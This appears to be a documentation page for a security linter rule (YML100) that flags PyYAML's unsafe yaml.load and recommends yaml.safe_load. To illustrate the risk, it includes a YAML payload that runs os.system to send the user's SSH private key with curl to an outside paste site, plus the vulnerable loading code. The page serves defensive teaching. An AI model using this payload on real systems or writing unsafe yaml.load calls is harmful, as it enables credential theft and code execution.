#YML100

Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

The Pyyaml library's default loader will parse YAML like this:

```yaml
!!python/object/apply:os.system ["cat ~/.ssh/id_rsa | curl -F 'sprunge=<-' http://sprunge.us"]
```

Using `yaml.load` against this input would execute local commands on the host shell

## Deprecation in pyyaml 5.1

Newer versions of Pyyaml (5.1) will raise a warning, however many situations like web servers developers would not see this warning.

## Example

```python
import yaml
with open('cfg.yaml') as cfg:
    config = yaml.load(cfg)
```

## Quick Fixes

* Plugin will recommend [Safe Load Fixer](../fixes/safeloadfixer.md).

## See Also

* [YAML Load Input Documentation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)